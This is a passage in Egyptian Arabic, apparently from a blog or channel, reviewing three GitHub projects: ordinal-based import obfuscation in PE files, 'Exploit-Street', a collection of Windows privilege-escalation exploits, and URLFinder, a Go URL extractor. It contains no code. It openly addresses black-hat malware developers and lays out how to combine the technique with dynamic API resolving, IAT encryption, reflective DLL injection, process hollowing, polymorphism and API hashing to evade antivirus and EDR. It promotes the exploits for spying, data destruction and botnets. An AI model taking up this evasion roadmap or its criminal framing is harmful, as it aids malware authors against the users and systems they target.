LoadLibrary أو GetProcAddress. لكن التكنيك هنا بيبدل الأسماء دي بأرقام بترمز للدوال داخل الـ DLL (اللي هي الـ ordinals)، وده بيصعب عملية التحليل على أدوات الفحص لأن الأرقام مش بتدي فكرة مباشرة عن الوظيفة اللي بيقوم بيها المالوير. في سياق المالوير أو تطوير أدوات الاختراق، ده معناه إنك بتصعب اكتشاف الكود بتاعك سواء باستخدام التحليل الساكن أو الديناميكي و بالنسبة لفائدة المالوير ده لأي بلاك هات، هو بيخدم أكتر على مرحلة التخفي. الحماية الحديثة زي برامج مكافحة الفيروسات بتعتمد بشكل كبير على تحليل الجداول اللي بتكون موجودة في ملفات الـ PE زي Import Address Table. لما يتم استدعاء الدوال بالأرقام بدل الأسماء، ده بيعمل نوع من الـ Obfuscation اللي بيخلي من الصعب معرفة الوظائف المستدعاة. كمان، لو ضيفت مع التكنيك ده Dynamic Linking يعني تستدعي مكتبات في وقت التشغيل مش وقت التحميل، هتقلل فرصة اكتشاف المالوير أكتر و علشان مطور المالوير يدمج التقنية دي في المالوير بتاعه، لازم الأول يكون فاهم كويس جدًا طريقة عمل Import Address Table (IAT) اللي هي الجزء المسؤول عن تحميل واستدعاء دوال النظام في ملفات الـ PE. باستخدام مكتبة زي pefile، المطور يقدر يحلل الـ IAT ويعيد كتابتها علشان تستدعي الدوال باستخدام Ordinals. ده ممكن يكون مفيد جدًا لو المالوير بيحاول يتجنب توقيعات الحماية الموجودة في أنظمة مكافحة الفيروسات و لما نيجي نتكلم عن تطوير المشروع أو تحسينه، فيه أفكار كتير ممكن البلاك هات يضيفوها. مثلًا، ممكن يدمج التقنية دي مع Dynamic API Resolving ودي فكرة تعتمد على إن المالوير يستدعي الدوال بطريقة ديناميكية وقت التشغيل Runtime بدل ما تكون محددة مسبقًا في الكود. التقنية دي بتعتمد على استدعاء دوال زي LoadLibrary و GetProcAddress لتحميل مكتبات النظام والدوال المطلوبة ديناميكيًا. الفكرة دي لما تتدمج مع Ordinal Imports بتخلي المالوير أكتر تعقيدًا وصعب اكتشافه و كمان ممكن إضافة أساليب تانية زي Encryption أو Obfuscation للـ Import Table. بمعنى إن مش بس الدوال بتتحول لـ Ordinals، لكن كمان يتم تشفير الجدول بالكامل ويكون المالوير هو المسؤول عن فك التشفير وقت التشغيل. ده بيمنع أي أدوات تحليل من إنها تقرأ الـ IAT بسهولة و من ضمن الأفكار اللي ممكن تتطبق برضه هي دمج المشروع مع تقنية Reflective DLL Injection. دي تقنية بيتم فيها تحميل مكتبة DLL في ذاكرة الجهاز بدون ما يتم تسجيلها في الـ Process Address Space. لما التقنية دي تتدمج مع Ordinal Imports، المالوير هيقدر يخفي عملياته بشكل كامل تقريبًا عن أدوات المراقبة و عشان مطور المالوير يدمج التكنيك ده في كوده، لازم أول حاجة يكون عنده فهم كويس جدًا ببنية ملفات PE والـ IAT. لازم يكون عارف إزاي يعدل الجداول دي باستخدام مكتبات معالجة زي pefile في بايثون أو أدوات مباشرة زي C/C++. كمان ممكن يضيف تكنيكات تانية زي Code Injection أو Process Hollowing. يعني بدل ما المالوير يشتغل مباشرة، يحقن نفسه في عملية تانية مشبوهة ويستخدم الـ Ordinal Imports هناك عشان يزود الغموض واحد من الأفكار القوية اللي ممكن البلاك هات يدمجها مع المشروع ده هو Memory Mapping Techniques. يعني بدل ما الملفات تبقى على القرص الصلب وتتعرض للفحص، يتم تحميلها مباشرة في الذاكرة ويشتغل المالوير من هناك. مع استخدام الـ Ordinal Imports الديناميكي، بيضمن إن الكود مش هيبان بسهولة. كمان ممكن يضيف Polymorphic Code عشان يتغير شكله مع كل تنفيذ أما عن استغلال المشروع في الاختراق، فيقدر أي مهاجم يستخدمه لتطوير برمجيات Anti-Copy متقدمة، بمعنى إنه يحمي ملفات أو برامج من النسخ بطريقة خبيثة. ممكن يراقب الـ I/O الخاص بالجهاز أو يمنع عمليات النسخ باستخدام Hooking للوظائف المرتبطة بالملفات. ولو طوره أكتر ممكن يدمج فيه تكنيكات Exploits عشان يستغل نقاط الضعف في النظام أثناء تطبيق الـ DRM أخيرًا، لو بنتكلم عن تحسين الأداة دي لمستوى أعلى، المطور ممكن يدمجها مع تكنيكات زي API Hashing اللي بتستخدم الـ Hash بدل الـ ordinals أو الأسماء. ده بيعقد الكود أكتر وبيصعب اكتشافه. وكمان ممكن يضيف String Encryption عشان يخفي أي نصوص واضحة جوا الكود. الفكرة كلها إن التكنيكات دي لو اتوظفت صح هتعمل فرق كبير لأي مالوير سواء من حيث التخفي أو التنفيذ على النظام المستهدف
رابط المشروع على جيت هوبمشروع Exploit-Street هو مكتبة ضخمة مخصصة لتجميع استغلالات تصعيد الامتيازات (LPE) على أنظمة ويندوز بداية من 2023 والمشروع بيتميز إنه بيقدم استغلالات مُحدثة ومُجمعة من مصادر مختلفة سواء كانت استغلالات منشورة بالفعل أو تعديلات جديدة على ثغرات قديمة ويُعتبر المشروع ده كنز لأي بلاك هات أو مطور برمجيات ضارة (Malware Developer) لأنه بيوفر بيئة و المشروع مكتوب بلغة برمجة قوية زي C++ وC وأحيانًا بيتضمن سكريبتات مكتوبة بـ PowerShell و كل حاجة فيه جاهزة لفهم واستخدام نقاط الضعف في الأنظمة المستهدفة بشكل علمي ومنظم ولما نيجي نتكلم عن الفايدة اللي ممكن يحققها البلاك هات من المشروع ده فهو بيقدر يستخدم الأكواد الجاهزة فيه لاستهداف أنظمة ويندوز وتصعيد الامتيازات للوصول إلى صلاحيات أعلى زي صلاحيات الأدمن وده بيساعد في تثبيت برمجيات ضارة أو تشغيل أوامر متقدمة على الأجهزة المستهدفة كمان المشروع ده مفيد لأي مطور مالوير لأنه بيتيح ليه فرصة دراسة الأكواد الجاهزة وتعديلها لتتناسب مع أهدافه الشخصية زي كتابة مالويرات خبيثة تستغل الثغرات الموجودة لتحقيق أهداف مختلفة زي التجسس أو تدمير البيانات أو حتى إنشاء شبكات Botnet ضخمة وممكن البلاك هات يطور المشروع ده عن طريق إضافة استغلالات جديدة تعتمد على ثغرات تم اكتشافها مؤخرًا أو إنه يحسن الأكواد الموجودة لتجاوز أنظمة الحماية زي الـAntivirus والـEDR باستخدام تقنيات مثل التشفير أو إخفاء الأكواد الخبيثة داخل عمليات شرعية وممكن كمان يدمج المشروع مع أدوات تانية زي Metasploit أو Cobalt Strike لتحقيق اختراقات متقدمة تعتمد على الربط بين أكثر من نوع استغلال وأفكار الدمج مش بتقف عند كده البلاك هات ممكن يستغل الأكواد الجاهزة في كتابة Payloads أكثر ذكاءً تستخدم تقنيات مثل DLL Injection أو Process Hollowing لتنفيذ الأكواد الضارة بدون ما يتم اكتشافها بسهولة كمان المشروع بيتيح مرونة في استخدامه لأن الأكواد المكتوبة فيه قابلة للتعديل والتطوير بسهولة باستخدام لغات زي C++ وC وده بيخلي المشروع أساس قوي لأي حد عاوز يكتب استغلالات مخصصة لأهداف معينة وفي النهاية المشروع مش مجرد مجموعة أكواد ولكنه منصة تعليمية وتجريبية لأي حد عاوز يتعمق في مجال استغلال الثغرات وتصعيد الامتيازات
رابط المشروع على جيت هوب
مشروع URLFinder هو أداة مفتوحة المصدر مكتوبة بلغة Go ومصممة لاستخراج عناوين URL المخفية أو الظاهرة من النصوص أو الأكواد باستخدام تعبيرات منتظمة Regex وده معناه إن الأداة دي بتقدر تتعامل مع أي ملف نصي وتستخرج منه كل الروابط بغض النظر عن تعقيدها أو مكانها في النص وده بيخليها مفيدة جدًا سواء للوايت هات اللي بيستخدمها في اختبارات الاختراق وجمع المعلومات أو للبلاك هات اللي بيدور على طرق استغلال روابط حساسة أو مخفية الهدف الأساسي من URLFinder هو توفير طريقة سريعة وفعالة لتحليل ملفات ضخمة مليانة بيانات زي أكواد المصدرية أو ملفات الـ logs أو أي ملفات نصية تانية عشان تستخرج منها الروابط اللي ممكن تكون بوابة لهجمات سيبرانية زي الهجمات على صفحات مخفية أو استغلال API Endpoints أو حتى تحميل ملفات حساسة بشكل غير مصرح بيه الأداة بتشتغل من خلال أنها بتستخدم مكتبة قوية في Go بتتعامل مع النصوص وتستخرج كل الروابط اللي بتطابق الأنماط المحددة في التعبيرات المنتظمة وده بيضمن إنها بتطلع أي رابط موجود في النص بغض النظر عن مكانه أو تعقيده بالنسبة للبلاك هات فالأداة بتقدم قيمة كبيرة جدًا في مرحلة جمع المعلومات Reconnaissance لأنها بتساعدك تلاقي روابط ممكن تكون مهملة أو مش مستخدمة لكنها لسه فعالة وبالتالي ممكن تستخدمها في شن هجمات زي SQL Injection لو الرابط فيه Parameters أو XSS لو الرابط بيقبل إدخال المستخدم بدون تحقق كافي أو حتى استخدام الروابط دي في إعادة توجيه Redirect Attacks عشان توصل لصفحات ضحية أو صفحات إحتيالية تانية زي صفحات Phishing الأداة كمان ممكن تكون مفيدة لو هتستخدمها مع Web Crawlers تعمل بها مسح شامل لأي موقع على الإنترنت وتستخرج منه كل الروابط الديناميكية والستاتيكية كمان بالنسبة لتطوير الأداة ممكن تضيف مميزات زي تحليل الروابط بعد استخراجها عشان تعرف إيه الهجمات اللي ممكن تستغلها أو إضافة خاصية البحث في ملفات بصيغ أكتر زي JSON أو XML أو HTML وكمان ممكن تضيف تكامل مع أدوات زي Metasploit أو Burp Suite عشان الروابط المستخرجة تتحول تلقائيًا لاستغلالات أو محاولات هجوم لو عاوز توسع الاستفادة من الأداة أكتر ممكن تدمجها مع قاعدة بيانات تخزن فيها الروابط اللي استخرجتها وتحللها لاحقًا أو تضيف دعم للذكاء الاصطناعي عشان يساعدك يفرق بين الروابط المهمة وغير المهمة أو حتى يحدد احتمالية تعرض الرابط لهجوم الأداة مبنية بلغة Go وده بيديها سرعة وأداء عاليين خصوصًا لما تتعامل مع ملفات ضخمة أو عمليات تحليل سريعة ولو عاوز تحسن أدائها أكتر ممكن تطور الأكواد بتاعتها عشان تقلل من الـ False Positives أو تضيف خصائص تحليل ديناميكية للروابط بعد استخراجها وده يخليها مش بس بتطلع روابط لكنها كمان بتحللها وتحدد نقاط الضعف فيها الأداة دي بالنسبة لأي بلاك هات هي أداة متعددة الاستخدامات وممكن تتطور وتتكامل مع أدوات تانية أو حتى تبني عليها مشاريع أكبر عشان تجمع بيانات أكتر وتستغلها بشكل أذكى سواء في هجمات منظمة أو اختبارات أمنية معقدة
رابط المشروع على جيت هوب
